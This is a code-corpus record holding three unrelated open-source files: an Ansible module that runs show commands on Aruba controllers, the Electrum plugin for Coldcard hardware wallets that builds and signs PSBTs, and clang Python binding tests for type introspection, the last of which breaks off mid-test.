daenamkim/ansible | lib/ansible/modules/network/aruba/aruba_command.py | 17 | 6873 | #!/usr/bin/python
#
# Copyright: Ansible Team
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: aruba_command
version_added: "2.4"
author: "James Mighion (@jmighion)"
short_description: Run commands on remote devices running Aruba Mobility Controller
description:
- Sends arbitrary commands to an aruba node and returns the results
read from the device. This module includes an
argument that will cause the module to wait for a specific condition
before returning or timing out if the condition is not met.
- This module does not support running commands in configuration mode.
Please use M(aruba_config) to configure Aruba devices.
extends_documentation_fragment: aruba
options:
commands:
description:
- List of commands to send to the remote aruba device over the
configured provider. The resulting output from the command
is returned. If the I(wait_for) argument is provided, the
module does not return until the condition is satisfied or
the number of retries has expired.
required: true
wait_for:
description:
- List of conditions to evaluate against the output of the
command. The task will wait for each condition to be true
before moving forward. If the conditional is not true
within the configured number of retries, the task fails.
See examples.
required: false
default: null
aliases: ['waitfor']
match:
description:
- The I(match) argument is used in conjunction with the
I(wait_for) argument to specify the match policy. Valid
values are C(all) or C(any). If the value is set to C(all)
then all conditionals in the wait_for must be satisfied. If
the value is set to C(any) then only one of the values must be
satisfied.
required: false
default: all
choices: ['any', 'all']
retries:
description:
- Specifies the number of retries a command should be tried
before it is considered failed. The command is run on the
target device every retry and evaluated against the
I(wait_for) conditions.
required: false
default: 10
interval:
description:
- Configures the interval in seconds to wait between retries
of the command. If the command does not pass the specified
conditions, the interval indicates how long to wait before
trying the command again.
required: false
default: 1
"""
EXAMPLES = """
tasks:
- name: run show version on remote devices
aruba_command:
commands: show version
- name: run show version and check to see if output contains Aruba
aruba_command:
commands: show version
wait_for: result[0] contains Aruba
- name: run multiple commands on remote nodes
aruba_command:
commands:
- show version
- show interfaces
- name: run multiple commands and evaluate the output
aruba_command:
commands:
- show version
- show interfaces
wait_for:
- result[0] contains Aruba
- result[1] contains Loopback0
"""
RETURN = """
stdout:
description: The set of responses from the commands
returned: always
type: list
sample: ['...', '...']
stdout_lines:
description: The value of stdout split into a list
returned: always
type: list
sample: [['...', '...'], ['...'], ['...']]
failed_conditions:
description: The list of conditionals that have failed
returned: failed
type: list
sample: ['...', '...']
"""
import time
from ansible.module_utils.network.aruba.aruba import run_commands
from ansible.module_utils.network.aruba.aruba import aruba_argument_spec, check_args
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.common.utils import ComplexList
from ansible.module_utils.network.common.parsing import Conditional
from ansible.module_utils.six import string_types
def to_lines(stdout):
for item in stdout:
if isinstance(item, string_types):
item = str(item).split('\n')
yield item
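# Illustrative behavior (hedged sketch):
#   list(to_lines(['a\nb', ['c']])) -> [['a', 'b'], ['c']]
# string responses are split on newlines; already-listed items pass through.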
def parse_commands(module, warnings):
command = ComplexList(dict(
command=dict(key=True),
prompt=dict(),
answer=dict()
), module)
commands = command(module.params['commands'])
for index, item in enumerate(commands):
if module.check_mode and not item['command'].startswith('show'):
warnings.append(
'only show commands are supported when using check mode, not '
'executing `%s`' % item['command']
)
elif item['command'].startswith('conf'):
module.fail_json(
msg='aruba_command does not support running config mode '
'commands. Please use aruba_config instead'
)
return commands
def main():
"""main entry point for module execution
"""
argument_spec = dict(
commands=dict(type='list', required=True),
wait_for=dict(type='list', aliases=['waitfor']),
match=dict(default='all', choices=['all', 'any']),
retries=dict(default=10, type='int'),
interval=dict(default=1, type='int')
)
argument_spec.update(aruba_argument_spec)
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True)
result = {'changed': False}
warnings = list()
check_args(module, warnings)
commands = parse_commands(module, warnings)
result['warnings'] = warnings
wait_for = module.params['wait_for'] or list()
conditionals = [Conditional(c) for c in wait_for]
retries = module.params['retries']
interval = module.params['interval']
match = module.params['match']
while retries > 0:
responses = run_commands(module, commands)
for item in list(conditionals):
if item(responses):
if match == 'any':
conditionals = list()
break
conditionals.remove(item)
if not conditionals:
break
time.sleep(interval)
retries -= 1
if conditionals:
failed_conditions = [item.raw for item in conditionals]
msg = 'One or more conditional statements have not been satisfied'
module.fail_json(msg=msg, failed_conditions=failed_conditions)
result.update({
'changed': False,
'stdout': responses,
'stdout_lines': list(to_lines(responses))
})
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 |
fujicoin/electrum-fjc | electrum/plugins/coldcard/coldcard.py | 2 | 26391 | #
# Coldcard Electrum plugin main code.
#
#
from struct import pack, unpack
import os, sys, time, io
import traceback
from electrum.bip32 import BIP32Node, InvalidMasterKeyVersionBytes
from electrum.i18n import _
from electrum.plugin import Device
from electrum.keystore import Hardware_KeyStore, xpubkey_to_pubkey, Xpub
from electrum.transaction import Transaction
from electrum.wallet import Standard_Wallet
from electrum.crypto import hash_160
from electrum.util import bfh, bh2u, versiontuple, UserFacingException
from electrum.base_wizard import ScriptTypeNotSupported
from electrum.logging import get_logger
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import LibraryFoundButUnusable
_logger = get_logger(__name__)
try:
import hid
from ckcc.protocol import CCProtocolPacker, CCProtocolUnpacker
from ckcc.protocol import CCProtoError, CCUserRefused, CCBusyError
from ckcc.constants import (MAX_MSG_LEN, MAX_BLK_LEN, MSG_SIGNING_MAX_LENGTH, MAX_TXN_LEN,
AF_CLASSIC, AF_P2SH, AF_P2WPKH, AF_P2WSH, AF_P2WPKH_P2SH, AF_P2WSH_P2SH)
from ckcc.constants import (
PSBT_GLOBAL_UNSIGNED_TX, PSBT_IN_NON_WITNESS_UTXO, PSBT_IN_WITNESS_UTXO,
PSBT_IN_SIGHASH_TYPE, PSBT_IN_REDEEM_SCRIPT, PSBT_IN_WITNESS_SCRIPT,
PSBT_IN_BIP32_DERIVATION, PSBT_OUT_BIP32_DERIVATION, PSBT_OUT_REDEEM_SCRIPT)
from ckcc.client import ColdcardDevice, COINKITE_VID, CKCC_PID, CKCC_SIMULATOR_PATH
requirements_ok = True
class ElectrumColdcardDevice(ColdcardDevice):
# avoid use of pycoin for MiTM message signature test
def mitm_verify(self, sig, expect_xpub):
# verify a signature (65 bytes) over the session key, using the master bip32 node
# - customized to use specific EC library of Electrum.
pubkey = BIP32Node.from_xkey(expect_xpub).eckey
try:
pubkey.verify_message_hash(sig[1:65], self.session_key)
return True
except:
return False
except ImportError:
requirements_ok = False
COINKITE_VID = 0xd13e
CKCC_PID = 0xcc10
CKCC_SIMULATED_PID = CKCC_PID ^ 0x55aa
def my_var_int(l):
# Bitcoin serialization of integers... directly into binary!
if l < 253:
return pack("B", l)
elif l < 0x10000:
return pack("<BH", 253, l)
elif l < 0x100000000:
return pack("<BI", 254, l)
else:
return pack("<BQ", 255, l)
def xfp_from_xpub(xpub):
# sometimes we need the BIP32 fingerprint value: 4 bytes of ripemd(sha256(pubkey))
# UNTESTED
kk = bfh(Xpub.get_pubkey_from_xpub(xpub, []))
assert len(kk) == 33
xfp, = unpack('<I', hash_160(kk)[0:4])
return xfp
class CKCCClient:
# Challenge: I haven't found anywhere that defines a base class for this 'client',
# nor an API (interface) to be met. Winging it. Gets called from lib/plugins.py mostly?
def __init__(self, plugin, handler, dev_path, is_simulator=False):
self.device = plugin.device
self.handler = handler
# if we know what the (xfp, xpub) "should be" then track it here
self._expected_device = None
if is_simulator:
self.dev = ElectrumColdcardDevice(dev_path, encrypt=True)
else:
# open the real HID device
import hid
hd = hid.device(path=dev_path)
hd.open_path(dev_path)
self.dev = ElectrumColdcardDevice(dev=hd, encrypt=True)
# NOTE: MiTM test is delayed until we have a hint as to what XPUB we
# should expect. It's also kinda slow.
def __repr__(self):
return '<CKCCClient: xfp=%08x label=%r>' % (self.dev.master_fingerprint,
self.label())
def verify_connection(self, expected_xfp, expected_xpub):
ex = (expected_xfp, expected_xpub)
if self._expected_device == ex:
# all is as expected
return
if ( (self._expected_device is not None)
or (self.dev.master_fingerprint != expected_xfp)
or (self.dev.master_xpub != expected_xpub)):
# probably indicating programming error, not hacking
_logger.info(f"xpubs. reported by device: {self.dev.master_xpub}. "
f"stored in file: {expected_xpub}")
raise RuntimeError("Expecting 0x%08x but that's not what's connected?!" %
expected_xfp)
# check signature over session key
# - mitm might have lied about xfp and xpub up to here
# - important that we use value capture at wallet creation time, not some value
# we read over USB today
self.dev.check_mitm(expected_xpub=expected_xpub)
self._expected_device = ex
_logger.info("Successfully verified against MiTM")
def is_pairable(self):
# can't do anything w/ devices that aren't set up (but not normally reachable)
return bool(self.dev.master_xpub)
def timeout(self, cutoff):
# nothing to do?
pass
def close(self):
# close the HID device (so can be reused)
self.dev.close()
self.dev = None
def is_initialized(self):
return bool(self.dev.master_xpub)
def label(self):
# 'label' of this Coldcard. Warning: gets saved into wallet file, which might
# not be encrypted, so better for privacy if based on xpub/fingerprint rather than
# USB serial number.
if self.dev.is_simulator:
lab = 'Coldcard Simulator 0x%08x' % self.dev.master_fingerprint
elif not self.dev.master_fingerprint:
# fallback; not expected
lab = 'Coldcard #' + self.dev.serial
else:
lab = 'Coldcard 0x%08x' % self.dev.master_fingerprint
# Hack zone: during initial setup I need the xfp and master xpub but
# very few objects are passed between the various steps of base_wizard.
# Solution: return a string with some hidden metadata
# - see <https://stackoverflow.com/questions/7172772/abc-for-string>
# - needs to work w/ deepcopy
class LabelStr(str):
def __new__(cls, s, xfp=None, xpub=None):
self = super().__new__(cls, str(s))
self.xfp = getattr(s, 'xfp', xfp)
self.xpub = getattr(s, 'xpub', xpub)
return self
return LabelStr(lab, self.dev.master_fingerprint, self.dev.master_xpub)
def has_usable_connection_with_device(self):
# Do end-to-end ping test
try:
self.ping_check()
return True
except:
return False
def get_xpub(self, bip32_path, xtype):
assert xtype in ColdcardPlugin.SUPPORTED_XTYPES
_logger.info('Derive xtype = %r' % xtype)
xpub = self.dev.send_recv(CCProtocolPacker.get_xpub(bip32_path), timeout=5000)
# TODO handle timeout?
# change type of xpub to the requested type
try:
node = BIP32Node.from_xkey(xpub)
except InvalidMasterKeyVersionBytes:
raise UserFacingException(_('Invalid xpub magic. Make sure your {} device is set to the correct chain.')
.format(self.device)) from None
if xtype != 'standard':
xpub = node._replace(xtype=xtype).to_xpub()
return xpub
def ping_check(self):
# check connection is working
assert self.dev.session_key, 'not encrypted?'
req = b'1234 Electrum Plugin 4321' # free up to 59 bytes
try:
echo = self.dev.send_recv(CCProtocolPacker.ping(req))
assert echo == req
except:
raise RuntimeError("Communication trouble with Coldcard")
def show_address(self, path, addr_fmt):
# prompt user w/ address; also returns it immediately.
return self.dev.send_recv(CCProtocolPacker.show_address(path, addr_fmt), timeout=None)
def get_version(self):
# gives list of strings
return self.dev.send_recv(CCProtocolPacker.version(), timeout=1000).split('\n')
def sign_message_start(self, path, msg):
# this starts the UX experience.
self.dev.send_recv(CCProtocolPacker.sign_message(msg, path), timeout=None)
def sign_message_poll(self):
# poll device... if user has approved, will get tuple: (addr, sig) else None
return self.dev.send_recv(CCProtocolPacker.get_signed_msg(), timeout=None)
def sign_transaction_start(self, raw_psbt, finalize=True):
# Multiple steps to sign:
# - upload binary
# - start signing UX
# - wait for coldcard to complete process, or have it refused.
# - download resulting txn
assert 20 <= len(raw_psbt) < MAX_TXN_LEN, 'PSBT is too big'
dlen, chk = self.dev.upload_file(raw_psbt)
resp = self.dev.send_recv(CCProtocolPacker.sign_transaction(dlen, chk, finalize=finalize),
timeout=None)
if resp != None:
raise ValueError(resp)
def sign_transaction_poll(self):
# poll device... if user has approved, will get tuple: (length, checksum) else None
return self.dev.send_recv(CCProtocolPacker.get_signed_txn(), timeout=None)
def download_file(self, length, checksum, file_number=1):
# get a file
return self.dev.download_file(length, checksum, file_number=file_number)
class Coldcard_KeyStore(Hardware_KeyStore):
hw_type = 'coldcard'
device = 'Coldcard'
def __init__(self, d):
Hardware_KeyStore.__init__(self, d)
# Errors and other user interaction is done through the wallet's
# handler. The handler is per-window and preserved across
# device reconnects
self.force_watching_only = False
self.ux_busy = False
# Seems like only the derivation path and resulting **derived** xpub is stored in
# the wallet file... however, we need to know at least the fingerprint of the master
# xpub to verify against MiTM, and also so we can put the right value into the subkey paths
# of PSBT files that might be generated offline.
# - save the fingerprint of the master xpub, as "xfp"
# - it's a LE32 int, but hex more natural way to see it
# - device reports these value during encryption setup process
lab = d['label']
if hasattr(lab, 'xfp'):
# initial setup
self.ckcc_xfp = lab.xfp
self.ckcc_xpub = lab.xpub
else:
# wallet load: fatal if missing, we need them!
self.ckcc_xfp = d['ckcc_xfp']
self.ckcc_xpub = d['ckcc_xpub']
def dump(self):
# our additions to the stored data about keystore -- only during creation?
d = Hardware_KeyStore.dump(self)
d['ckcc_xfp'] = self.ckcc_xfp
d['ckcc_xpub'] = self.ckcc_xpub
return d
def get_derivation(self):
return self.derivation
def get_client(self):
# called when user tries to do something like view address, sign something.
# - not called during probing/setup
rv = self.plugin.get_client(self)
if rv:
rv.verify_connection(self.ckcc_xfp, self.ckcc_xpub)
return rv
def give_error(self, message, clear_client=False):
self.logger.info(message)
if not self.ux_busy:
self.handler.show_error(message)
else:
self.ux_busy = False
if clear_client:
self.client = None
raise UserFacingException(message)
def wrap_busy(func):
# decorator: function takes over the UX on the device.
def wrapper(self, *args, **kwargs):
try:
self.ux_busy = True
return func(self, *args, **kwargs)
finally:
self.ux_busy = False
return wrapper
def decrypt_message(self, pubkey, message, password):
raise UserFacingException(_('Encryption and decryption are currently not supported for {}').format(self.device))
@wrap_busy
def sign_message(self, sequence, message, password):
# Sign a message on device. Since we have big screen, of course we
# have to show the message unambiguously there first!
try:
msg = message.encode('ascii', errors='strict')
assert 1 <= len(msg) <= MSG_SIGNING_MAX_LENGTH
except (UnicodeError, AssertionError):
# there are other restrictions on message content,
# but let the device enforce and report those
self.handler.show_error('Only short (%d max) ASCII messages can be signed.'
% MSG_SIGNING_MAX_LENGTH)
return b''
client = self.get_client()
path = self.get_derivation() + ("/%d/%d" % sequence)
try:
cl = self.get_client()
try:
self.handler.show_message("Signing message (using %s)..." % path)
cl.sign_message_start(path, msg)
while 1:
# How to kill some time, without locking UI?
time.sleep(0.250)
resp = cl.sign_message_poll()
if resp is not None:
break
finally:
self.handler.finished()
assert len(resp) == 2
addr, raw_sig = resp
# already encoded in Bitcoin fashion, binary.
assert 40 < len(raw_sig) <= 65
return raw_sig
except (CCUserRefused, CCBusyError) as exc:
self.handler.show_error(str(exc))
except CCProtoError as exc:
self.logger.exception('Error showing address')
self.handler.show_error('{}\n\n{}'.format(
_('Error showing address') + ':', str(exc)))
except Exception as e:
self.give_error(e, True)
# give empty bytes for error cases; it seems to clear the old signature box
return b''
def build_psbt(self, tx: Transaction, wallet=None, xfp=None):
# Render a PSBT file, for upload to Coldcard.
#
if xfp is None:
# need fingerprint of MASTER xpub, not the derived key
xfp = self.ckcc_xfp
inputs = tx.inputs()
if 'prev_tx' not in inputs[0]:
# fetch info about inputs, if needed?
# - needed during export PSBT flow, not normal online signing
assert wallet, 'need wallet reference'
wallet.add_hw_info(tx)
# wallet.add_hw_info installs this attr
assert tx.output_info is not None, 'need data about outputs'
# Build a map from each needed pubkey to its derivation from the master, in PSBT binary format
# 1) binary version of the common subpath for all keys
# m/ => fingerprint LE32
# a/b/c => ints
base_path = pack('<I', xfp)
for x in self.get_derivation()[2:].split('/'):
if x.endswith("'"):
x = int(x[:-1]) | 0x80000000
else:
x = int(x)
base_path += pack('<I', x)
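# Illustrative expansion (hedged; xfp value assumed): with xfp=0x0f056943 and
# derivation "m/84'/0'/0'", base_path works out to
#   pack('<I', 0x0f056943) + pack('<I', 84 | 0x80000000)
#   + pack('<I', 0x80000000) + pack('<I', 0x80000000)
# i.e. the LE32 master fingerprint followed by LE32 (hardened) child indexes.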
# 2) all used keys in transaction
subkeys = {}
derivations = self.get_tx_derivations(tx)
for xpubkey in derivations:
pubkey = xpubkey_to_pubkey(xpubkey)
# assuming depth two, non-hardened: change + index
aa, bb = derivations[xpubkey]
assert 0 <= aa < 0x80000000
assert 0 <= bb < 0x80000000
subkeys[bfh(pubkey)] = base_path + pack('<II', aa, bb)
for txin in inputs:
if txin['type'] == 'coinbase':
self.give_error("Coinbase not supported")
if txin['type'] in ['p2sh', 'p2wsh-p2sh', 'p2wsh']:
self.give_error('No support yet for inputs of type: ' + txin['type'])
# Construct PSBT from start to finish.
out_fd = io.BytesIO()
out_fd.write(b'psbt\xff')
def write_kv(ktype, val, key=b''):
# serialize helper: write w/ size and key byte
out_fd.write(my_var_int(1 + len(key)))
out_fd.write(bytes([ktype]) + key)
if isinstance(val, str):
val = bfh(val)
out_fd.write(my_var_int(len(val)))
out_fd.write(val)
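# Example of the wire format (hedged): write_kv(PSBT_IN_SIGHASH_TYPE, pack('<I', 1))
# would emit varint keylen 0x01, the key type byte (0x03 per BIP-174), varint
# vallen 0x04, then the LE32 sighash b'\x01\x00\x00\x00'.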
# global section: just the unsigned txn
class CustomTXSerialization(Transaction):
@classmethod
def input_script(cls, txin, estimate_size=False):
return ''
unsigned = bfh(CustomTXSerialization(tx.serialize()).serialize_to_network(witness=False))
write_kv(PSBT_GLOBAL_UNSIGNED_TX, unsigned)
# end globals section
out_fd.write(b'\x00')
# inputs section
for txin in inputs:
if Transaction.is_segwit_input(txin):
utxo = txin['prev_tx'].outputs()[txin['prevout_n']]
spendable = txin['prev_tx'].serialize_output(utxo)
write_kv(PSBT_IN_WITNESS_UTXO, spendable)
else:
write_kv(PSBT_IN_NON_WITNESS_UTXO, str(txin['prev_tx']))
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
pubkeys = [bfh(k) for k in pubkeys]
for k in pubkeys:
write_kv(PSBT_IN_BIP32_DERIVATION, subkeys[k], k)
if txin['type'] == 'p2wpkh-p2sh':
assert len(pubkeys) == 1, 'can be only one redeem script per input'
pa = hash_160(k)
assert len(pa) == 20
write_kv(PSBT_IN_REDEEM_SCRIPT, b'\x00\x14'+pa)
out_fd.write(b'\x00')
# outputs section
for o in tx.outputs():
# can be empty, but must be present, and helpful to show change outputs
# wallet.add_hw_info() adds some data about change outputs into tx.output_info
if o.address in tx.output_info:
# this address "is_mine" but might not be change (I like to sent to myself)
output_info = tx.output_info.get(o.address)
index, xpubs = output_info.address_index, output_info.sorted_xpubs
if index[0] == 1 and len(index) == 2:
# it is a change output (based on our standard derivation path)
assert len(xpubs) == 1 # not expecting multisig
xpubkey = xpubs[0]
# document its bip32 derivation in output section
aa, bb = index
assert 0 <= aa < 0x80000000
assert 0 <= bb < 0x80000000
deriv = base_path + pack('<II', aa, bb)
pubkey = bfh(self.get_pubkey_from_xpub(xpubkey, index))
write_kv(PSBT_OUT_BIP32_DERIVATION, deriv, pubkey)
if output_info.script_type == 'p2wpkh-p2sh':
pa = hash_160(pubkey)
assert len(pa) == 20
write_kv(PSBT_OUT_REDEEM_SCRIPT, b'\x00\x14' + pa)
out_fd.write(b'\x00')
return out_fd.getvalue()
@wrap_busy
def sign_transaction(self, tx, password):
# Build a PSBT in memory, upload it for signing.
# - we can also work offline (without paired device present)
if tx.is_complete():
return
client = self.get_client()
assert client.dev.master_fingerprint == self.ckcc_xfp
raw_psbt = self.build_psbt(tx)
#open('debug.psbt', 'wb').write(out_fd.getvalue())
try:
try:
self.handler.show_message("Authorize Transaction...")
client.sign_transaction_start(raw_psbt, True)
while 1:
# How to kill some time, without locking UI?
time.sleep(0.250)
resp = client.sign_transaction_poll()
if resp is not None:
break
rlen, rsha = resp
# download the resulting txn.
new_raw = client.download_file(rlen, rsha)
finally:
self.handler.finished()
except (CCUserRefused, CCBusyError) as exc:
self.logger.info(f'Did not sign: {exc}')
self.handler.show_error(str(exc))
return
except BaseException as e:
self.logger.exception('')
self.give_error(e, True)
return
# trust the coldcard to re-serialize the final product, right?
tx.update(bh2u(new_raw))
@staticmethod
def _encode_txin_type(txin_type):
# Map from Electrum code names to our code numbers.
return {'standard': AF_CLASSIC, 'p2pkh': AF_CLASSIC,
'p2sh': AF_P2SH,
'p2wpkh-p2sh': AF_P2WPKH_P2SH,
'p2wpkh': AF_P2WPKH,
'p2wsh-p2sh': AF_P2WSH_P2SH,
'p2wsh': AF_P2WSH,
}[txin_type]
@wrap_busy
def show_address(self, sequence, txin_type):
client = self.get_client()
address_path = self.get_derivation()[2:] + "/%d/%d"%sequence
addr_fmt = self._encode_txin_type(txin_type)
try:
try:
self.handler.show_message(_("Showing address ..."))
dev_addr = client.show_address(address_path, addr_fmt)
# we could double check address here
finally:
self.handler.finished()
except CCProtoError as exc:
self.logger.exception('Error showing address')
self.handler.show_error('{}\n\n{}'.format(
_('Error showing address') + ':', str(exc)))
except BaseException as exc:
self.logger.exception('')
self.handler.show_error(exc)
class ColdcardPlugin(HW_PluginBase):
keystore_class = Coldcard_KeyStore
minimum_library = (0, 7, 2)
client = None
DEVICE_IDS = [
(COINKITE_VID, CKCC_PID),
(COINKITE_VID, CKCC_SIMULATED_PID)
]
#SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
SUPPORTED_XTYPES = ('standard', 'p2wpkh', 'p2wpkh-p2sh')
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_devices(self.DEVICE_IDS)
self.device_manager().register_enumerate_func(self.detect_simulator)
def get_library_version(self):
import ckcc
try:
version = ckcc.__version__
except AttributeError:
version = 'unknown'
if requirements_ok:
return version
else:
raise LibraryFoundButUnusable(library_version=version)
def detect_simulator(self):
# if there is a simulator running on this machine,
# return details about it so it's offered as a pairing choice
fn = CKCC_SIMULATOR_PATH
if os.path.exists(fn):
return [Device(path=fn,
interface_number=-1,
id_=fn,
product_key=(COINKITE_VID, CKCC_SIMULATED_PID),
usage_page=0,
transport_ui_string='simulator')]
return []
def create_client(self, device, handler):
if handler:
self.handler = handler
# We are given a HID device, or at least some details about it.
# Not sure why we aren't just given a HID library handle, but
# the 'path' is unambiguous, so we'll use that.
try:
rv = CKCCClient(self, handler, device.path,
is_simulator=(device.product_key[1] == CKCC_SIMULATED_PID))
return rv
except:
self.logger.info('late failure connecting to device?')
return None
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
client.handler = self.create_handler(wizard)
def get_xpub(self, device_id, derivation, xtype, wizard):
# this seems to be part of the pairing process only, not during normal ops?
# base_wizard:on_hw_derivation
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = self.create_handler(wizard)
client.ping_check()
xpub = client.get_xpub(derivation, xtype)
return xpub
def get_client(self, keystore, force_pair=True):
# All client interaction should not be in the main GUI thread
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
#if client:
# client.used()
if client is not None:
client.ping_check()
return client
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
# Standard_Wallet => not multisig, must be bip32
if type(wallet) is not Standard_Wallet:
keystore.handler.show_error(_('This function is only available for standard wallets when using {}.').format(self.device))
return
sequence = wallet.get_address_index(address)
txin_type = wallet.get_txin_type(address)
keystore.show_address(sequence, txin_type)
# EOF
| mit |
ah744/ScaffCC_RKQC | clang/bindings/python/tests/cindex/test_type.py | 5 | 7493 | from clang.cindex import CursorKind
from clang.cindex import TypeKind
from nose.tools import raises
from .util import get_cursor
from .util import get_tu
kInput = """\
typedef int I;
struct teststruct {
int a;
I b;
long c;
unsigned long d;
signed long e;
const int f;
int *g;
int ***h;
};
"""
def test_a_struct():
tu = get_tu(kInput)
teststruct = get_cursor(tu, 'teststruct')
assert teststruct is not None, "Could not find teststruct."
fields = list(teststruct.get_children())
assert all(x.kind == CursorKind.FIELD_DECL for x in fields)
assert fields[0].spelling == 'a'
assert not fields[0].type.is_const_qualified()
assert fields[0].type.kind == TypeKind.INT
assert fields[0].type.get_canonical().kind == TypeKind.INT
assert fields[1].spelling == 'b'
assert not fields[1].type.is_const_qualified()
assert fields[1].type.kind == TypeKind.TYPEDEF
assert fields[1].type.get_canonical().kind == TypeKind.INT
assert fields[1].type.get_declaration().spelling == 'I'
assert fields[2].spelling == 'c'
assert not fields[2].type.is_const_qualified()
assert fields[2].type.kind == TypeKind.LONG
assert fields[2].type.get_canonical().kind == TypeKind.LONG
assert fields[3].spelling == 'd'
assert not fields[3].type.is_const_qualified()
assert fields[3].type.kind == TypeKind.ULONG
assert fields[3].type.get_canonical().kind == TypeKind.ULONG
assert fields[4].spelling == 'e'
assert not fields[4].type.is_const_qualified()
assert fields[4].type.kind == TypeKind.LONG
assert fields[4].type.get_canonical().kind == TypeKind.LONG
assert fields[5].spelling == 'f'
assert fields[5].type.is_const_qualified()
assert fields[5].type.kind == TypeKind.INT
assert fields[5].type.get_canonical().kind == TypeKind.INT
assert fields[6].spelling == 'g'
assert not fields[6].type.is_const_qualified()
assert fields[6].type.kind == TypeKind.POINTER
assert fields[6].type.get_pointee().kind == TypeKind.INT
assert fields[7].spelling == 'h'
assert not fields[7].type.is_const_qualified()
assert fields[7].type.kind == TypeKind.POINTER
assert fields[7].type.get_pointee().kind == TypeKind.POINTER
assert fields[7].type.get_pointee().get_pointee().kind == TypeKind.POINTER
assert fields[7].type.get_pointee().get_pointee().get_pointee().kind == TypeKind.INT
constarrayInput="""
struct teststruct {
void *A[2];
};
"""
def testConstantArray():
tu = get_tu(constarrayInput)
teststruct = get_cursor(tu, 'teststruct')
assert teststruct is not None, "Didn't find teststruct??"
fields = list(teststruct.get_children())
assert fields[0].spelling == 'A'
assert fields[0].type.kind == TypeKind.CONSTANTARRAY
assert fields[0].type.get_array_element_type() is not None
assert fields[0].type.get_array_element_type().kind == TypeKind.POINTER
assert fields[0].type.get_array_size() == 2
def test_equal():
"""Ensure equivalence operators work on Type."""
source = 'int a; int b; void *v;'
tu = get_tu(source)
a = get_cursor(tu, 'a')
b = get_cursor(tu, 'b')
v = get_cursor(tu, 'v')
assert a is not None
assert b is not None
assert v is not None
assert a.type == b.type
assert a.type != v.type
assert a.type != None
assert a.type != 'foo'
def test_typekind_spelling():
"""Ensure TypeKind.spelling works."""
tu = get_tu('int a;')
a = get_cursor(tu, 'a')
assert a is not None
assert a.type.kind.spelling == 'Int'
def test_function_argument_types():
"""Ensure that Type.argument_types() works as expected."""
tu = get_tu('void f(int, int);')
f = get_cursor(tu, 'f')
assert f is not None
args = f.type.argument_types()
assert args is not None
assert len(args) == 2
t0 = args[0]
assert t0 is not None
assert t0.kind == TypeKind.INT
t1 = args[1]
assert t1 is not None
assert t1.kind == TypeKind.INT
args2 = list(args)
assert len(args2) == 2
assert t0 == args2[0]
assert t1 == args2[1]
@raises(TypeError)
def test_argument_types_string_key():
"""Ensure that non-int keys raise a TypeError."""
tu = get_tu('void f(int, int);')
f = get_cursor(tu, 'f')
assert f is not None
args = f.type.argument_types()
assert len(args) == 2
args['foo']
@raises(IndexError)
def test_argument_types_negative_index():
"""Ensure that negative indexes on argument_types Raises an IndexError."""
tu = get_tu('void f(int, int);')
f = get_cursor(tu, 'f')
args = f.type.argument_types()
args[-1]
@raises(IndexError)
def test_argument_types_overflow_index():
"""Ensure that indexes beyond the length of Type.argument_types() raise."""
tu = get_tu('void f(int, int);')
f = get_cursor(tu, 'f')
args = f.type.argument_types()
args[2]
@raises(Exception)
def test_argument_types_invalid_type():
"""Ensure that obtaining argument_types on a Type without them raises."""
tu = get_tu('int i;')
i = get_cursor(tu, 'i')
assert i is not None
i.type.argument_types()
def test_is_pod():
"""Ensure Type.is_pod() works."""
tu = get_tu('int i; void f();')
i = get_cursor(tu, 'i')
f = get_cursor(tu, 'f')
assert i is not None
assert f is not None
assert i.type.is_pod()
assert not f.type.is_pod()
def test_function_variadic():
"""Ensure Type.is_function_variadic works."""
source ="""
#include <stdarg.h>
void foo(int a, ...);
void bar(int a, int b);
"""
tu = get_tu(source)
foo = get_cursor(tu, 'foo')
bar = get_cursor(tu, 'bar')
assert foo is not None
assert bar is not None
assert isinstance(foo.type.is_function_variadic(), bool)
assert foo.type.is_function_variadic()
assert not bar.type.is_function_variadic()
def test_element_type():
"""Ensure Type.element_type works."""
tu = get_tu('int i[5];')
i = get_cursor(tu, 'i')
assert i is not None
assert i.type.kind == TypeKind.CONSTANTARRAY
assert i.type.element_type.kind == TypeKind.INT
@raises(Exception)
def test_invalid_element_type():
"""Ensure Type.element_type raises if type doesn't have elements."""
tu = get_tu('int i;')
i = get_cursor(tu, 'i')
assert i is not None
i.element_type
def test_element_count():
"""Ensure Type.element_count works."""
tu = get_tu('int i[5]; int j;')
i = get_cursor(tu, 'i')
j = get_cursor(tu, 'j')
assert i is not None
assert j is not None
assert i.type.element_count == 5
try:
j.type.element_count
assert False
except:
assert True
def test_is_volatile_qualified():
"""Ensure Type.is_volatile_qualified works."""
tu = get_tu('volatile int i = 4; int j = 2;')
i = get_cursor(tu, 'i')
j = get_cursor(tu, 'j')
assert i is not None
assert j is not None
assert isinstance(i.type.is_volatile_qualified(), bool)
assert i.type.is_volatile_qualified()
assert not j.type.is_volatile_qualified()
def test_is_restrict_qualified():
"""Ensure Type.is_restrict_qualified works."""
tu = get_tu('struct s { void * restrict i; void * j };')
i = get_cursor(tu, 'i')
j = get_cursor(tu, 'j')
assert i is not None
assert j is not None
